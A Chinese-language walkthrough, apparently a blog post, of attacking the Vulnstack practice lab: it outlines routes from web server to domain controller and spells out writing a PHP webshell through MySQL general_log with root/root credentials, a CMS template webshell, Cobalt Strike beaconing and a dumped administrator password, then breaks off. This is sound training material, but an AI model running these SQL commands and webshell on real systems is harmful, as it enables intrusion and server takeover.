作者:linshao
靶场下载地址:
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
目录
web->内网(两条路线:)
一.php探针->mysql弱口令->目录扫描phpmyadmin->日志写shell
二.目录扫描yxcms.rar->后台弱口令->模板写shell
内网->域控(三条线路:)
一.密码抓取->寻找域控->psexec登录域控->get
二.主机发现->漏洞扫描->域控存在ms17-010->msf代理攻击->get
三.主机发现->端口扫描->redis未授权->getshell->正向上线msf->提权->get
一、web->内网
一.php探针->mysql弱口令->目录扫描phpmyadmin->日志写shell
1.mysql弱口令:主页尝试root/root数据库连接正常
2.目录扫描phpmyadmin:目录扫描存在phpmyadmin
3.日志写shell:
文件导出被禁止
测试一下确实无法导出
select "test" into outfile "C:\\www\\phpstudy\\test.php"
使用日志写shell
//设置日志文件,web绝对路径可以从探针得知
SET GLOBAL general_log_file = "C:\phpStudy\WWW\1.php";
set global general_log='on'; //开启日志
SELECT '<?php assert($_REQUEST["cmd"]);?>';
4.访问成功:
二.目录扫描yxcms.rar->后台弱口令->模板写shell
1.目录扫描yxcms.rar:
2.登录后台,新建模板
3.访问shell,模板文件位置可在本地搭建环境得知
内网->域控
先上线cs,powershell上线失败,生成exe上线成功
一.密码抓取->寻找域控->psexec登录域控
密码抓取
Administrator/Admin@123